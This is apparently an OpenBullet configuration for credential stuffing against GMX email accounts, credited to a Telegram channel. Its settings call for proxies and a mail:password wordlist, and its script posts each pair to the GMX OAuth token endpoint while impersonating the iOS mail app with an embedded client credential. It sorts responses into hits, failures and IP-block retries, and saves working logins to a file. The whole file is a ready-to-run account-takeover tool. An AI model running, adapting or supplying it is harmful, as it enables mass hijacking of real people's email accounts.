[SETTINGS]
{
  "Name": "gmx.de",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2023-11-18T13:47:50.4030558+03:30",
  "AdditionalInfo": "Telegram Channel: @OpenBulletChannel | Save Hits | CPM Rate: 100-1000",
  "RequiredPlugins": [],
  "Author": "@TheOwn",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://oauth2.gmx.com/token" 
  CONTENT "username=<USER>&grant%5Ftype=password&password=<PASS>&device%5Fname=iOS%5FDevice" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: oauth2.gmx.com" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=utf-8" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "User-Agent: GMX%20Mail/6242 CFNetwork/1474 Darwin/23.0.0" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: */*" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Authorization: Basic Z214Y29tX21haWxhcHBfaW9zOlpjcFU4RDVkajNXUWdCd2hMYVNyaHdBQ3d1V1RKQ0I4dGlLZU4wZW0=" 
  HEADER "Content-Length: 90" 
  HEADER "X-UI-APP: gmx.ios.iosmail/8.65.6242" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Missing or invalid parameters" 
    KEY "Perm.BAD_REQUEST" 
    KEY "Perm.ACCOUNT_NOT_FOUND_OR_PASSWORD_WRONG" 
    KEY "Perm.ACCOUNT_LOCKED" 
  KEYCHAIN Success OR 
    KEY "access_token" 
  KEYCHAIN Retry OR 
    KEY "Perm.IP_BLOCKED" 

#SS UTILITY File "GMX Accounts .txt" AppendLines "<USER>:<PASS> | Telegram Channel: @OpenBulletChannel" -> VAR "SS" 

